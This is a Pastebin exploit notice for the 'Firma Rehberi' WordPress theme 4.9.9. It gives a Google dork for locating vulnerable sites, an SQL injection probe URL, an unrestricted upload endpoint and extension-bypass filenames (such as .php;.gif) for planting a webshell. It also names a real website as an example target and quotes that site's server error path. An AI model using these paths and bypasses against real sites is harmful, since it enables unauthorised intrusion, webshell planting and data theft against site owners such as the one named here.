API tools faq
paste
KingSkrupellos

WordPress Firma Rehberi Themes 4.9.9 SQL Injection Shell Upl

KingSkrupellos
Dec 23rd, 2018
227
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.09 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress Firma Rehberi Themes 4.9.9 SQL Injection and Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 22/12/2018
  6. # Vendor Homepage : wordpress.org ~ temafabrika.com/demo/rehber3/
  7. # Software Download Link : temafabrika.com/wordpress-responsive-firma-rehberi-3-temasi.html
  8. # Software Price : 150 TL
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : V4.9.9 ~ PHP 5.6.30 ~ jQuery 1.12.2
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/themes/rehber/js/''
  14. # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  15. CWE-264 - [ Permissions, Privileges, and Access Controls ] - + CWE-434- [ Unrestricted Upload of File with Dangerous Type ]
  16.  
  17. #################################################################################################
  18.  
  19. # Admin Panel Login Path :
  20.  
  21. /wp-login.php
  22.  
  23. # SQL Injection Exploit :
  24.  
  25. /wp-content/themes/rehber/index.php?id=1%27
  26.  
  27. # Arbitrary File Upload/Shell Upload Exploit :
  28.  
  29. /wp-content/themes/rehber/js/upload.php
  30.  
  31. # Directory File Path :
  32.  
  33. /fresim/resim[RANDOMNUMBERS][YOURFILENAMEHERE].php;.gif
  34.  
  35. # Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg
  36.  
  37. #################################################################################################
  38.  
  39. # Example Vulnerable Site =>
  40.  
  41. [+] bagcilarfirmarehberi.com/wp-content/themes/rehber/js/upload.php
  42.  
  43. #################################################################################################
  44.  
  45. # SQL Database Error :
  46.  
  47. Fatal error: Call to undefined function get_header() in /home/bagcilarfirma/public_html/wp-content/themes/rehber/index.php on line 1
  48.  
  49. #################################################################################################
  50.  
  51. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  52.  
  53. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!